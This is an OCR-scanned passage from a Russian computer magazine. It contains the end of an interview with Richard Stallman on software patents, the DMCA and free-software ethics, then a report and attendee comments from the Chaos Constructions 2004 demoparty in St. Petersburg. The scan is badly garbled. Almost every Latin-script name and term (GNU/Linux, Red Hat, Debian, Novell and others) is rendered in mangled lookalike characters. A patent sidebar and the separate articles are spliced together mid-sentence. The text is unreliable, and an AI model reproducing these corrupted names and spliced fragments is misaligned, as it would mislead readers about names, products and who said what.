тентные права и может быть привлечен к от- 
ветственности. Патенты на ПО ограничивают 
каждого разработчика. Все это выгодно толь- 
ко мегакорпорациям, так как у них всегда 
очень много патентов в своей сфере деятель- 
ности. Сейчас в Евросоюзе очень сильно дви- 
жение против патентов на ПО, которое берет 
начало из движения за свободное ПО. Евро- 
парламент проголосовал против патентов в 
сентябре прошлого года. Правительство Ни- 
дерландов перестало поддерживать патенты 
на ПО несколько недель назад, хотя мнение 
членов парламента и разделились. Что будет 
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ПОТЕНТЫ И ИСКИ 



К онсалтинговая компания 05РМ (Ореп Зоигсе Різк 
Мападетепі:) подсчитала, что существует по крайней мере 
283 патента, держатели которых при желании могут возбудить 
иски к разработчикам СЫІІ/ипих. Единственной хорошей но- 
востью является то, что все эти патенты еще не выдержали про- 
верку в суде. Треть из них (98 штук) принадлежит дружествен- 
ным к І_іпих компаниям - ІВМ (60 штук), НР (20 штук), Іп1:еІ (11 
штук) и т.д. 10 процентов - МісгозоЙ :). 

Речь идет о системе, основанной на ядре І_іпих 2.4 и 2.6. Хотя раз- 
бирательства с патентами не начнутся раньше 2006 года, компа- 
ния 05РМ уже подсчитала, сколько потребуется денег на подоб- 
ные судебные тяжбы: 150 тыс. долларов в год на само разбира- 
тельство и до 5 млн. долларов в качестве компенсации истцу. 
Специалисты 05РМ подчеркивают, что компания 5СО уже давно 
точит зубы на ІВМ, а амбиции 5СО нельзя сбрасывать со счетов. 



в конце, еще не ясно, но возможно, нам 
удастся выиграть эту битву в Евросоюзе. 

Я надеюсь, что Россия не пойдет на поводу 
этой глупой политики, так как введение патен- 
тов на ПО даст лишь контроль иностранным 
компаниям над использованием компьютеров 
в России. Мое личное мнение об этих патен- 
тах таково - они полностью уничтожают свобо- 
ду во всем, что хоть как-то связано с компью- 
терами. Есть еще ЭМСА, американский закон, 
за нарушение которого был арестован Дмит- 
рий Скляров. Этот закон запрещает использо- 
вание важной свободной программы ЭеСЗЗ, с 
помощью которой можно смотреть видео на 
Ц\Ю. Я очень огорчился, когда узнал, что Рос- 
сия тоже приняла похожий закон. Хотя прог- 
рамма Дмитрия Склярова и не была свобод- 
ной, все-таки его имя запомнилось многим 
американцам, которые требуют свободу ис- 
пользования компьютера любым способом, 
если это не наносит кому-либо вред. 

А: Вы когда-нибудь пробовали работать в 
ѴѴіпсІоѵѵз? 

РС: Совсем немного. Пару раз мне надо 
было поработать не на собственном ПК. 

А: Как она Вам? 

РС: Я не исследовал ее. Мне нужно было 
только переписать свое электронное письмо 
с сервера 6 N11 на дискетку. Чтобы осущест- 
вить эту сугубо практическую задачу, мне не 
потребовалось много времени. Так что свое 
мнение я составить не успел. 

А: А ВЗО-системы Вы пробовали? 

РС: Фонд свободного ПО использовал 
ВЗО-системы на некоторых своих машинах в 
90-ых годах, потому что ОМІІ/ипих не под- 
держивал их аппаратные конфигурации. 
Большую часть работы я делал в Етасз и в 
командной строке, так что особой разницы 
между ВЗО и ОМІІ/ипих не заметил. 

А: На Ваш взгляд, все существующее ПО 
должно быть свободным? 

РС: Каждая установленная вами програм- 
ма должна быть свободной: вы должны иметь 
право копировать ее, изменять и распростра- 
нять. Если вы хотите передать эту программу 
кому-то еще, то должны уважать права и это- 
го человека. Он тоже должен иметь те же 
свободы, что и вы. Это не значит, что прог- 
рамма просто обязана все время изменяться 
и распространяться. Вы можете с ней это де- 
лать, но только если захотите сами. 

А: Разве конкуренция между собственни- 
ческим ПО и свободным не является пози- 
тивной силой, приводящей к прогрессу? 

РС: Я так не считаю. Несвободные прог- 
раммы распространяются таким образом, 
что их пользователи становятся беспомощ- 
ными и разъединенными. Это неправильно, 
это зло, так быть не должно. Любое зло 
имеет некоторые побочные эффекты, кото- 
рые могут быть позитивными. Собственни- 
ческие программы могут быть воплощением 
новых идей, которые стоит реализовать и в 
свободном ПО. Если эти идеи не защищены 
патентом, то это, безусловно, плюс. Но это 
не должно нас останавливать в нашей борь- 
бе за свободу пользователей. Самый важный 
вид прогресса - это прогресс, вызванный 



свободой и объединением. Свободное ПО 
дает пользователям свободу объединяться. 

А: Вы можете прокомментировать факт 
приобретения компанией МоѵеІІ двух других 
компаний (ЗиЗЕ І_іпих и Хітіап), которые спе- 
циализируется на разработке свободного ПО? 

РС: Ни одна из них не специализируется 
на разработке свободного ПО по-настояще- 
му. Каждая из них имеет собственнические 
продукты. Хотя должен признать, после при- 
обретения этих компаний МоѵеІІ сделает 
свои продукты более либеральными. 

Тем не менее, МоѵеІІ имеет много своих 
собственных абсолютно несвободных прог- 
раммных продуктов. И, судя по всему, она 
вовсе не собирается менять свою политику. 

А: Можно ли утверждать, что большой 
бизнес наконец-то обратил свое присталь- 
ное внимание на свободное ПО и ОМІІ/ипих? 

РС: Этот процесс происходит уже несколь- 
ко лет. Хотя последствия этого неоднозначны. 
Положительные стороны известны всем, так 
что я не буду их затрагивать. А вот об отрица- 
тельных стоит поговорить. Бизнес-компании 
не акцентируют внимание на том, что пользо- 
ватели имеют право быть свободными. В 
этом-то все и дело. Я думаю, что так происхо- 
дит именно потому, что у крупных бизнес-ком- 
паний есть свои собственнические продукты 
тоже. Согласитесь, было бы невыгодно указы- 
вать пользователю, что эти продукты ущемля- 
ют их свободы. Разговор о свободном ПО ве- 
дется так, как будто оно является своего рода 
альтернативой собственническому. Основными 
аргументами в этом являются практические 
преимущества, и в результате свободное ПО 
теряет свой этический, философский базис. 

А: Какой дистрибутив ОМІІ/ипих Вы ис- 
пользуете сами? Считается, что Вы являе- 
тесь поклонником ОеЬіап ОМІІ/ипих? Это 
действительно так? 

РС: Я всегда предпочитал ОеЬіап, потому 
что этот дистрибутив поддерживал филосо- 
фию свободного ПО. Официальный дистри- 
бутив ОеЬіап ОМІІ/Ипих не включает в свой 
состав ни одну собственническую програм- 
му, в то время как другие дистрибутивы пос- 
тавляют и несвободные приложения. Тем не 
менее, ѵѵеЬ-сайт ОеЬіап описывает и предла- 
гает некоторые собственнические пакеты. 

Эти пакеты не являются частью ОеЬіап, но 



они присутствуют на сайте. Так что я не могу 
полностью рекомендовать ОеЬіап. 

В этом году я узнал об одном дистрибути- 
ве ОМІІ/ипих, который, на мой взгляд, явля- 
ется полностью свободным: 1ПТЯ0-е из Ар- 
гентины. Я бы хотел найти и другие свобод- 
ные дистрибутивы, которые мог бы потом 
порекомендовать. 

А: Считается, что люди, связанные с ОМЫ 
Ших, не любят РесІ На!. Это действительно так? 

РС: Это неправда. Мы критикуем компа- 
нию Веб На! за то, что она поставляет 
собственническое ПО в составе своего дист- 
рибутива, но в то же время мы благодарны 
ей за разработку большего числа очень по- 
лезных пакетов. Политика Веб На! по отно- 
шению к нашему сообществу намного лучше 
многих других, ведь Веб На! разрабатывает 
только свободное ПО. 

А: Иногда в прессе говорят, что свобод- 
ное ПО более надежно и безопасно, чем 
собственническое только потому, что оно 
свободно. Каково Ваше мнение? 

РС: Признаюсь честно, я не эксперт в об- 
ласти безопасности и надежности. Един- 
ственная реакцию, которую вызывают у меня 
компьютерные вирусы, - это нажатие кно- 
почки «б» на том сообщении, что содержит 
инфицированное вложение. 

А: Как Вы видите будущее свободного 
ПО? Оно вытеснит собственническое ПО че- 
рез 5 или 1 0 лет? 

РС: Я не могу предсказать вам то, что за- 
висит от вас самих. Победит ли свобода и 
демократия власть корпораций над ПО? 
Распространится ли эта власть на другие об- 
ласти жизнедеятельности? Это зависит от 
вас. Если вы присоединитесь к борьбе за 
свободу, мы можем выиграть. Если вы зак- 
роете на эту проблему глаза и будете прини- 
мать решения исходя из сиюминутной выго- 
ды, мы проиграем. 

А: Но как можно бороться за свободное 
ПО? 

РС: Есть много путей: 

л Писать свободное ПО. 

л Создавать свободные руководства для 
свободного ПО. 

л Создать группу пользователей 
ОМІІ/Ипих. Ц-С 
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0 это субботнее утро 2 1 августа в Питере шел ливень. Нормальные люди отсыпались после рабочей недели, а мы с Тохой шуровали в сто- 
рону Ленинградского Дворца молодежи (ПДИ). Именно там должен был состояться СНаоз Сопзігисііоп 2004 - крупнейшее деиопати в 
России. К тому времени, как закончился дождь, на мне не осталось ни клочка сухого места - Тоха умеет приютить под зонтом. Как бы там 
ни было, мокрый майнд и сухой Тоха точно по графику добрались до усповпенного места и под видом матерых журналистов проникни внутрь. 

РЕПОРТПЖ С КРУПНЕЙШЕГО ДЕИОППТИ РОССИИ 




А ДЕНЬ ПЕРВЫЙ: 
ПР 



ПРИКЛЮЧЕНИЯ 

зомбирующего квадратика 

О ткрытие фестиваля состоялось 
на полтора часа позже, чем 
планировалось. Впрочем, на- 
род у нас к этому делу при- 
вычный и относится с понима- 
нием. Возмущений никто не 
высказывал, наоборот, заде- 
ржка дала возможность прие- 
хавшим сценерам познакомиться и пооб- 
щаться друг с другом в реале. Кроме росси- 
ян, на пати прибыли украинцы, белорусы, 
австрийцы, фины. Был даже парнишка из 
Англии, которого быстро окружила нема- 
ленькая толпа и генерила ему вопросы на 
ломаном английском относительно забу- 
горной демосцены. Практически все сцене- 
ры представляли новую волну, хотя было и 
несколько «старичков», руливших в середи- 
не 90-х (товарищи Капо, ІІпЬеІіеѵег, Ларин 

и др.)- 

Билеты для нас были забронированы за- 
ранее, так что, не теряя времени, мы полу- 
чили отличительные знаки прессы - желтые 
браслетики на руку (у остальных гостей были 
шахматные) и пошли занимать козырные 
места. Для проведения пати выделили прос- 




торный кинотеатр вместимостью более 1 000 
человек. В отличие от ранних фестивалей, 
где работы показывали на мониторах, на 
этот раз задействовали приличный проек- 
тор. Картинка была хорошо видна даже с 
задних рядов. 

Помимо общего зала, внутри были еще 
пресс-центр и олдскул-зона. В первой стоя- 
ли два компа, подключенных к интернету, 
можно было проверить почту, что я периоди- 



чески и делал. 
Правда, Тоха вскоре 
словил по ѵѵі-Ті и нет 
на свой ноут, так что 
особой нужды нам 
толпиться в пресс- 
центре не было. 
Олдскул-зона предс- 
тавляла собой не- 
большое простран- 
ство, где показа- 
тельно работали 
около 1 5 старых ма- 
шин. Среди них бы- 
ли СоттосІоге64, 
несколько модифи- 
каций Аіагі, ноутбук 
«Арріе РоѵѵегЬоок 
100» 1991 года вы- 
пуска, русский аналог ХТ-шки ПЭВМ ЕС 
1841 , какой-то экзотический «Цирус» с сен- 
сорным экраном и напоминающий здоровен- 
ный КПК, старенькая графическая станция 
ІпсІідо-2 от Зііісоп СгарМсз, амижные клоны 
«Пегасус-1» и «Пегасус-2», а также суперд- 
ревний гробик с циферблатом вместо дисп- 
лея («Искра», если я не ошибаюсь). На 
компьютерах были запущены разные прог- 
раммы и игрушки (порадовала Ргіпсе оі 
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Регсіа), можно было поклацать и поиграться. 
А на Пегасах большую часть времени крути- 
ли амижные демки прошлых лет. 

Примерно в 12 часов дня, когда половина 
зала уже была забита, на сцену вышел глав- 
ный организатор Сева Потапов ака Папсіот, 
поприветствовал всех и объявил о начале 
СС. В первый день крутили, в основном, 
спектрумовские компо, а самое интересное - 
8 Ьіі бегло - как обычно, оставили на десерт 
(чтобы народ раньше времени не разбежал- 
ся). 

Первой показывали АЗСІІ-графику. Работ 
было всего 5: несимметричный Иисус Хрис- 
тос, профиль дедушки Ленина и еще что-то 
непонятное. Особенного восторга они у меня 
не вызвали - еще свежи впечатления от скри- 
нов Зкеісіі Вітапег’а. Вероятно, АЗСІІ-сцена 
сейчас переживает не лучшие времена. 

Затем началась демонстрация 7Х діх. 9 
картинок, из которых 5 - весьма достойных. 
Особенно понравились дети в окошке от 
Казік. Правда, я до сих пор не понимаю, за- 
чем спековские художники рисуют лица лю- 
дей, используя все цвета радуги. Получают- 
ся какие-то радиоактивные мутанты. Очевид- 
но, дань традиции - перебором красок на 
спектруме страдали всегда. В этот раз 
обошлось без голых теток, которые украша- 
ли в избытке графические компо предыду- 
щих пати и успели всем надоесть. Была одна 
тетка с большими сиськами на фоне крутой 
тачки, но, к счастью, в купальнике. 

В течение ѵѵііб компо, сменившего 8-бит- 
ную графику, показали несколько люби- 
тельских видеороликов, претендующих на 
звание «короткометражного фильма». Самый 
закрученный сюжет оказался у первой рабо- 
ты, где полковник русской армии гражданин 
Иванов спасал военную тайну от шпиона 
американской армии мистера Джона Смита. 
Чуваки лихо гоняли на игрушечных тачках, 
сражались на бумажных самолетах, перест- 
реливались пластмассовыми пистолетами... 
словом, вели себя, как герои голливудского 
боевика. А в конце случился хэппи энд и 
полковника повысили до генералиссимуса. В 



остальных фильмах смысл я найти пытался, 
но так и не смог. В одном клипе чувак 5 ми- 
нут остервенело рубит полено, называя себя 
папой Карло, в другом какой-то хрюндель 
под трек «Зѵѵееі Огеатз» бредет по сугробам 
непонятно куда и зачем, в третьем вообще 
нарезали кучу фрагментов и запихнули в 
рандом ном порядке - смотрите, радуйтесь. 
Словом, кина не вышло, но посмотреть этот 
бред было забавно. 

Примерно в середине первого дня на 
большом экране появился квадратик, громко 
гудящий и пускающий в зрителей зомбирую- 
щие волны. Этот простенький эффект был 
написан неким Копех для 7Х 51 2 байт интро, 
но то ли по ошибке, то ли ради прикола ор- 
ганизаторы дали его раньше. И до закрытия 
первого дня бешеный квадратик появлялся 
еще не раз, приводя публику в восторг. Во 
времена затишья народ требовал показать 
им квадратик и громко скандировал: «Копех! 
Копех!». Вапсіот даже пообещал, что обдол- 
банный квадратик станет символом СС05 ;). 

Вскоре запустили 7Х тизіс компо, и мы, 
недолго думая, сбежали в местную бильярд- 
ную покатать шары и перекусить. 

Когда вернулись, на сцене какой-то чувак 
демонстрировал новую игру. Оказалось, что 
это тот самый Юрий Матвеев из легендар- 
ной группы 51ер, которая в начале 90-х вы- 
пускала дискмаг ЗесІгоТоп, а в 95-ом заре- 
лизила нашумевшую игру «Звездное насле- 
дие». Геймуха с отрендеренными пейзажа- 
ми оказалась писишным сиквелом старого 
доброго «Наследия». Матвеев продемон- 
стрировал кусочек геймплея и пообещал, 
что релиз состоится в мае 2005 г. Не знаю, 
удастся ли писишному «Наследию» завое- 
вать внимание основной массы геймеров, 
все-таки для 2005 игра слишком простень- 
кая, но старые спектрумисты, включая ме- 
ня, не пройдут мимо. 

Продолжая тему игр, организаторы объя- 
вили о начале 7Х дате сотро. Я видел этот 
конкурс в программе, но ожидал максимум 
одну работу. Одно дело - нарисовать кар- 
тинку или написать небольшую демку к СС, 



Продолжая тему игр, организаторы 
обьявили о начале и дате сотро. 



СС4 В ЦИФРЛХ 

В сего на СС-2004 побывало (заполнило регистрационные ан- 
кеты) 428 человек. Из них 242 жителя Санкт-Петербурга и 
186 - из других городов и стран (включая дальнее зарубежье). 

Предварительно было забронировано 486 билетов, куплено 
(либо выдано бесплатно) во время фестиваля - 21 1 . То есть око- 
ло половины из тех, кто хотел приехать, - приехали. 

Число организаторов и помощников - около 40-45 человек. Для 
нужд оргкомитета использовалось порядка 20-25 компьютеров. 
Сумма, которая ушла на проведение СС-2004, колеблется меж- 
ду $6000 и $8000. Продажа билетов и СО возместила лишь нез- 
начительную часть расходов оргкомитета. 




Компьютеры из олдскул-зоны: «Искра» и две «Атари> 




другое - потратить кучу времени на разра- 
ботку игры. Но оказалось, что в компо 
участвуют аж 4 работы. Большинство апло- 
дисментов сорвал порт ѴѴоІТепзІеіп ЗЭ на 
7Х. Несколько лет назад парни из Эідііаі 
Веаіііу работали над разработкой Эоот на 
7Х, но в итоге забили, выпустив лишь дем- 
ку. Авторы вульфа, судя по всему, намере- 
ны идти до конца. Правда, хоть убейте, не 
представляю, каким надо быть маньяком, 
чтобы играть в ЭТО сейчас. При живом-то 
Фаркрае и третьем Думе... 

Остальными тремя играми были: хентай- 
ная адвентюра, демка шахмат с потрясаю- 
щим ИИ (я выиграл у компа одним конем) и 
игрушка, обучающая английскому языку. 

Десерт в виде 7Х демо компо разочаро- 
вал. У единственной более-менее нормаль- 
ной демки Тгаигшегк, состоящей, в основ- 
ном, из 30-эффектов, конкурентов не было. 
«А что было?» - спросишь ты. А была: 1 ) 
жутко печальная история размазанным 
шрифтом про то, что у автора никогда не 
было папы, с простеньким векторным эф- 
фектом в качестве бонуса; 2) последова- 
тельность хреново отсканенных картинок 
под жуткое громыхание; 3) куча пикселов на 
экране, двигающихся под занудный трек и 
образующих нелепые узоры; 4) коллекция 
плазмы со смешными картинками. Третью 
демку крутили минут десять, в конце народ 
уже не выдержал и требовал прекратить это 
безобразие. Да, друзья мои, это не 
«Рогеѵег» и не «РеТгезМ»... 

В течение первого (да и второго тоже) 
дня показывали 15-минутный фильм о ран- 
них демопати. В мувике рассказывалось о 
том, как все начиналось, передали атмосфе- 
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ру предыдущих ЕпІідМ’ов и СС, были фраг- 
менты интервью с известными сценерами. 
Когда я в середине 90-х отвисал на Спектру- 
ме, то читал все отчеты об этих пати и видел 
много фоток, так что теперь было интересно 
наблюдать дела давно минувших дней вжи- 
вую. Сценеры тоже восприняли фильм очень 
тепло. Многие улыбались, вспоминая о 
прошлом с ностальгией. 

Помимо этого, крутили еще один фильм, 
отснятый непосредственно на СС04. В нем 
оператор светил фонариком в лица хозяев 
стареньких машин из олдскульной зоны и 
выпытывал, что это за табуретки с кнопоч- 
ками. Ребята рассказывали, как когда-то 
эти машины были популярны и о них меч- 
тал каждый продвинутый молчел. Особенно 
интересно было послушать про КПК-мутан- 
та «Цирус», так как с этой машиной я столк- 
нулся впервые. 

В конце организаторы вывели на экран 
полюбившийся всем зомбирующий квадра- 
тик, и Рандом объявил о закрытии первого 
дня. Выходя из здания, мы увидели большую 
толпу тусующихся сценеров. Для многих из 
них впереди еще была айеграіу - традицион- 
ная пьянка с распитием пива-водки и обсуж- 
дением перспектив развития демосцены. Ну 
а мы с Тохой как последние трезвенники 
России отправились по домам, набираться 
сил перед вторым днем. 

Л ДЕНЬ ВТОРОЙ 

На следующий день погода не хулиганила - 
светило солнышко, и был прекрасный лет- 
ний день. Правда, Тоха все равно нашел в 
нем негатив и всю дорогу к ЛДМ рассказы- 
вал мне, как все плохо :). Справедливо ре- 
шив, что если вчера были задержки с нача- 
лом пати, то и сегодня им суждено быть, мы 
явились на СС в полдвенадцатого дня. Уже 
на подступах к зданию стало ясно, что аф- 
терпати удалась. Народ сидел на лавочках, 
отходя от, судя по всему, немеренного коли- 
чества водки. На лицах отображалась незем- 



Помимо этого, 
крутили еще один фильм, 
отснятый непосредственно на СС04. 




ная печаль. Внутрь зала, кстати, проносить 
алкоголь запрещалось, и все, кто пытался, 
его лишались. Один парнишка долго старал- 
ся прорваться сквозь невозмутимое зесигііу 
с двумя батлами водки. В конце концов вод- 
ка была изъята и впоследствии распита ор- 
ганизаторами. 

Так как свои желтые ленточки мы благопо- 
лучно посеяли, охрана нас не пускала, и пра- 
вильно делала. Вызвонив Вапсіот’а, мы с его 
помощью таки попали внутрь... и как раз ус- 
пели на тиШсІіаппеІ тизіс Ігасііііопаі. Лег я 
накануне поздно, как следует не выспался, 
так что первое компо стало хорошим подс- 
порьем досмотреть приятные эротические 
сны. А краем уха я оценивал творческие спо- 
собности музыкантов. Больше всего мне пон- 
равилась тихая медленная музычка АиШтп 
Зесгеіз, написанная неким ВіМі. Именно 
она и заняла первое место в своей номина- 
ции. Последней прокрутили какое-то бымц- 
кающее техно, народ хором начал возму- 
щаться, мол, что вы нам вешаете, какая это 
ТгабШопаІ. На что организатор пояснил, что 
раз звучит попсово, значит, попса, а раз поп- 
са, то ТгасІШопаІ ;). 

В следующей 
Мапсісігаѵѵп дЬ< 
сотро работы по 
уровню были очень 
разные. От совер- 
шенно невнятного 
«Темплара», нама- 
леванного с бодуна 
мышкой в Пейнте, и 
пейзажа лесной 
речки, украденного, 
судя по всему, с ху- 
дожественной выс- 
тавки ближайшего 
детсада, до совер- 
шенно потрясного 
рогатого толстячка 




и симпатичного детского портрета, выпол- 
ненного карандашом. Сидящие рядом ребя- 
та узнали в картинке с негром Майкла Джек- 
сона и потом все следующие скрины озву- 
чивали: «Это Майкл Джексон до операции», 
«А это после», «Это Майкл в детстве», «Тут 
он сменил пол». 

За рисованной графикой следовал гшШ- 
сМаппеІ тизіс аКегпайѵе. Это такой бумцкаю- 
щий факин щит, который ты меньше всего 
захочешь слушать, когда болит голова. Не 
сговариваясь, мы поднялись и пошли искать, 
где потише. Заодно перекусили холодным 
борщом и грибными блинами. 

К тому времени, как мы вернулись, на- 
чался уже следующий конкурс - Тгеез1:уІе діх. 
Грубо говоря, правил в нем нет. Ты можешь 
продемонстрировать все, от фильтрованной 
фоты соседской бабушки до своего отскани- 
рованного лобка. Главное - оригинальность. 
Запомнилась работа с изображением мла- 
денца с петухом на руке, а вокруг развали- 
ны, кукла Ѵообоо, свечи, змея, обломки иг- 







рушек и окровавленный тесак. Думаю, у ав- 
тора было точно счастливое детство :). Ка- 
кой-то перец выставил картинку с цветочка- 
ми, подписанную «Розы для Наташки». Дру- 
гой вставил большой глаз и спросил белы- 
ми буквами на синем фоне: «Как жить даль- 
ше?». Первое место заняла работа, которую 
я сперва принял за женские половые губы, 
но присмотревшись, распознал сидящего 
враскорячку мужика. Вот такой вот обман 
зрения. 

На очереди были трЗ тизіс зопд, гепсіег 
діх и трЗ тизіс іпзІгитепУ , но про них ниче- 
го не помню. Помню только, что инструмен- 
тальной музыки оказалось аж 20 штук и дли- 
лось это компо не меньше часа. Мы с Тохой 
добросовестно прослушали их все, благо отк- 
ровенной лажи не было. Некоторые треки я 
даже занес себе в КПК, буду в метро слушать. 

Во время проведения одной из музыкаль- 
ных компо произошел курьезный случай. На 
сцену вышел известный сценовый музыкант 
ЬА V, помогающий с организацией звука на 
пати, и потребовал выйти автора какой-то 
конкурсной композиции. Как оказалось, чу- 
вак практически полностью передрал один 
из ранних треков ІАѴ’а и попытался пропих- 
нуть его на конкурс. Понятное дело, І_АѴ та- 



кой наглости не стерпел и 
прилюдно в микрофон выс- 
казал челу все, что думает о 
такого рода «творчестве». 
Неудавшемуся плагиатору 
пришлось только разводить 
руками :). 

К трем часам народ стал 
подтягиваться на основные 
конкурсы: іпіго и бегло 
сотро. На большом экране 
появился трехмерный пейзаж 
- камера под музыку проно- 
силась над зелеными де- 
ревьями и зеленой землей, 
выхватывая из тумана новые 
растения. С виду ничего осо- 
бенного, фишка в том, что 
все это авторы вместили в 4 Кб. Рядом со 
мной сидели кодеры и бурно обсуждали, как 
подобное удалось. Было забавно послушать. 
Кстати, рекомендованная конфигурация РС 
для этого эффектика: Р4 3Гц, 512 Мб, 

Вабеоп 9800. ДумЗ меньше тормозит... 

На 4К іпіго сотро было заявлено 4 рабо- 
ты. Реально мне понравилась только одна - 
«НеликѴібео», с многочисленными эффекта- 
ми. Но первое место отхватила прогулка по 
картонному городу «ТМе Сгіте». 

Бето сотро справедливо считается ос- 
новным конкурсом на любой демопати, так 
что участники к нему готовятся особенно. 
Уровень показанных работ приятно удивил 
многих - в каждой было на что посмотреть. 
Половина из 7 демок базировалась на ЗЭ- 
ландшафтах, половина - на текстурных эф- 
фектах. Помимо техногенной ІІпбегзрасе от 
Сгоіух (она заняла первое место), впечатли- 
ла Ітадіпайоп. Простенькие эффекты, но в 
красивой обертке и со стильным дизайном 
- что еще надо, чтобы порадовать дядю 
майндворка? :) 

Во РІазМ 4МЬ бегло порадовала работа, 
рассказывающая о судьбе молодого нарко- 
мана. Мужик, влив пивка, захотел дунуть и 
поехал за наркотой в Питер. Там в метро на- 
шел наркодилера, передал ему бабло и ото- 
варился планом. Наркодельца тут же приня- 





ли менты, а наш герои ширнулся и пошел по 
бабам. Трахнув симпатичную девочку из ба- 
ра, наркоша решил, что с него хватит, и по- 
летел обратно на родину. Вот такая вот ин- 
тересная история, написанная на РІазІѴе. 
Многие в зале хохотали и аплодировали. 
Близка тема, не иначе :). 

После демоконкурсов начались геаі- 
Ііте’овые компо, где за час нужно было на- 
ваять музон и прогу, осуществляющую пе- 
реход из одной плоскости в другую. Затем 
вышел Вапбот и, постоянно подшучивая, 
объявил, что официальная часть фестиваля 
закончена. Впереди оставалась только це- 
ремония награждения, но любоваться чу- 
жими достижениями нас с Тохой не прель- 
щало. И, отпив на прощанье с Вапбот’ом 
пивка и мило пообщавшись об игровом 
бизнесе с одним олдскульным сценером, 
поспешили домой. 

Л МНЕНИЯ 

а Ник: ЗеЯж 
л Возраст: 18 
а Город: Питер 

а Коммент: учусь в СПМПК на 4 курсе, 
постоянно читаю ][ :). 

Организация в целом была удачной, хотя 
и были некоторые накладки. Место выбрали 
хорошее, ЛДМ для таких мероприятий впол- 
не подходит. Правда, я не нашел, где можно 
было нормально и недорого перекусить. 
Понравился фильм про ЕпІідМ. Качество 
представленных работ было на уровне. А вот 
народу, который пришел на них посмотреть, 
оказалось не так много, половина зала была 
пустой. Но зато была очень 
дружественная обстановка. В 
общем, несмотря на погоду в 
первый день, из-за которой, 
пока добирался, я промок до 
нитки, все очень понрави- 
лось. Обязательно приду и в 
следующем году, может, да- 
же принесу свою работу. 

л Ник: Оуп 
а Возраст: 21 
а Город: Питер 
Я, в общем-то, впервые 
на подобном пати, потому 
мое мнение сильно субъек- 
тивно. Организация, имхо, 
сильно хромала на обе ноги 



Организация в целом была удачной, 
хотя и были некоторые накладки. 




| Картинка юного маньяка 




Скриншот из демы Ітадіпаііоп (2 место в Атіда/РС 
Рето сотро) 



в первый день и на одну - во второй. В 
первый день конкурс приходилось искать в 
блокноте для голосования путем пролисты- 
вания оного. Постоянные задержки и факт 
того, что много людей так и не дождалось 
окончательных итогов (я в том числе), тоже 
не особо радовали. Но это все маленькая 
капля дегтя в большой бочке меда. Все 
конкурсанты постарались на славу, но пара 
работ запомнилась особенно. Конечно же, 
работа Копех'а, которую вначале показали 
не полностью, а после неоднократно повто- 
ряли, не знаю, случайно или специально. 
Подвиг неизвестного мне автора потряс 
весь зал - он умудрился впихнуть в конку- 
рсные 64 кб стильную и трехмерную дему. 
Запомнились также две песни из РС/Атіда 
трЗ зопд. Первая - это «Нажрись», явный 
закос под Горшка из КиШа, неплохо спе- 
тый. Другая - «Нет телевизорам» - пародия 
на Киркорова и просто песня с веселым 
текстом. До сих пор помню слова из нее: 

«А я водоканал, я вам воду даю». К слову 
сказать, все трЗ с конкурса я добавил се- 
бе в плеер, и, чувствую, часть из них попа- 
дет в список постоянно прослушиваемых. 
Порадовала фраза, прозвучавшая в воскре- 
сенье от одной из продавщиц ближайшего 
магазина: «А что, у них и завтра тоже бу- 
дет?». Конечный итог таков: пати однознач- 
но удалась и есть лишь незначительные 
претензии к организаторам. 

а Ник: ср{ 

л Возраст: 27 

а Город: Питер 

л Коммент: директор компании НВМ 
(разработка игр) 

Сразу признаюсь, что чуть не пропустил 
фестиваль. От демосцены я уже весьма да- 
лек, демки писал в начале 90-х, поэтому 
сейчас все происходящее воспринимал иск- 
лючительно как сторонний наблюдатель, 
время от времени отгоняя от себя приступы 
ностальгии. В целом все прошло очень удач- 
но. Приятно увидеть своими глазами, как 
много людей не безразличны к сцене. Во- 
зятся с компьютерами моего детства, эконо- 
мят байты, оптимизируют инструкции, пишут 



трехканальную музыку с «булькающим» 
агреддіо. И тащятся от этого! Все-таки сей- 
час, во время тотальной популяризации 
компьютеров это удивительно. 

По организации: 

ЛДМ вполне соответствует масштабам 
действа, большой экран, удобные места, за- 
мечательная идея с ультрафиолетовой подс- 
веткой... А самое главное - запрет алкоголя 
и весьма бдительная охрана. В следующем 
году обязательно приеду. Может быть, даже 
попробую «похайрить» толковых людей для 
геймдева. 

а Ник: хіосГсгоІух 
а Город: Гомель 

90% прошло крайне рулез! Единствен- 
ное, что не понравилось лично мне - геаі- 
йте компо, которые были на хрен не нуж- 
ны, а время оттянули капитально. Да и во- 
обще, лично мы (группа Сгоіух) билеты 
брали с прицелом на официальный график, 
а пришлось в полвосьмого лететь на вок- 
зал, пропуская все самое интересное. Не- 
хорошо. Непонятно, зачем было ждать, по- 
ка подтянется народ во второй день? Кто 
хотел прийти, тот сразу и пришел. А так, 
организация оказалась на удивительно вы- 
соком уровне. Оргам респект. Немного 
подкачал народ в зале. Конечно, выразить 
свое мнение о работе - это гуд, но не во 
время прослушивания же. Хотя больше 
всех поразил меня молодой человек с ноут- 
буком, сидевший во второй день прямо пе- 
редо мной. В общем, он ни разу не прого- 
лосовал и не смотрел на большой экран, а 
вместо этого настраивал РгееВЗО. Может, 
он место перепутал?? Ну и два охламона 
по бокам смотрели, как этот вундеркинд с 
умным видом несколько часов подряд лу- 
пил по клавишам консольные команды. (Хе- 
хе. Чувак, молодой человек с ноутбуком - 
это Тоха. А охламон слева - я. Приятно поз- 
накомиться :) - прим. тіпсІѵѵОгк). 

а Ник: ^ Мабсар 
а Возраст: 25 
а Город: Питер 

а Коммент: Участник тішк сотро 
Уровень организации заметно вырос. 
Организаторы проделали большую работу. 
Место очень удачное, большой зал, проек- 
тор... Что не понравилось: очень темное 
изображение на экране, мешающий свет, 
очень затянутый второй день. Все-таки бы- 




ло много иногородних, и из-за задержки 
они не смогли увидеть награждение. Это я 
не про себя, я-то почти до конца досидел. 

А в целом, СО 4ЕѴЕВ!!! 

а Ник: Эапко 
а Возраст: 1 6 
а Город: Москва 
а Коммент: кодер на РС 
Мы ездили с двумя друганами, добира- 
лись автостопом. Денег самый минимум, 
но пропустить не хотели. Все-таки событие 
какое! Сам я не сценер, но посмотреть на 
творения других интересно. Понравилась 
атмосфера на пати. Нет ни пьяных разбо- 
рок, ни блюющих орангутанов. Все цивиль- 
но, люди тусуются, общаются, обменива- 
ются впечатлениями. Познакомились там с 
ребятами из Питера, потом вместе пиво 
пили. Из конкурсов больше всего запомни- 
лась демка на флеше и, конечно, квадратик 
Конекса. Я реально угорал, когда его ста- 
вили снова и снова. Пользуясь случаем, 
передаю привет Антону, Максу, Роме и Ле- 
хе из Спб, с которыми мы классно потуси- 
ли. А также своей девушке Насте и сестру- 
хе Ленке. (А также своему попугаю, левому 
уху, правому уху и всем -всем -всем на бе- 
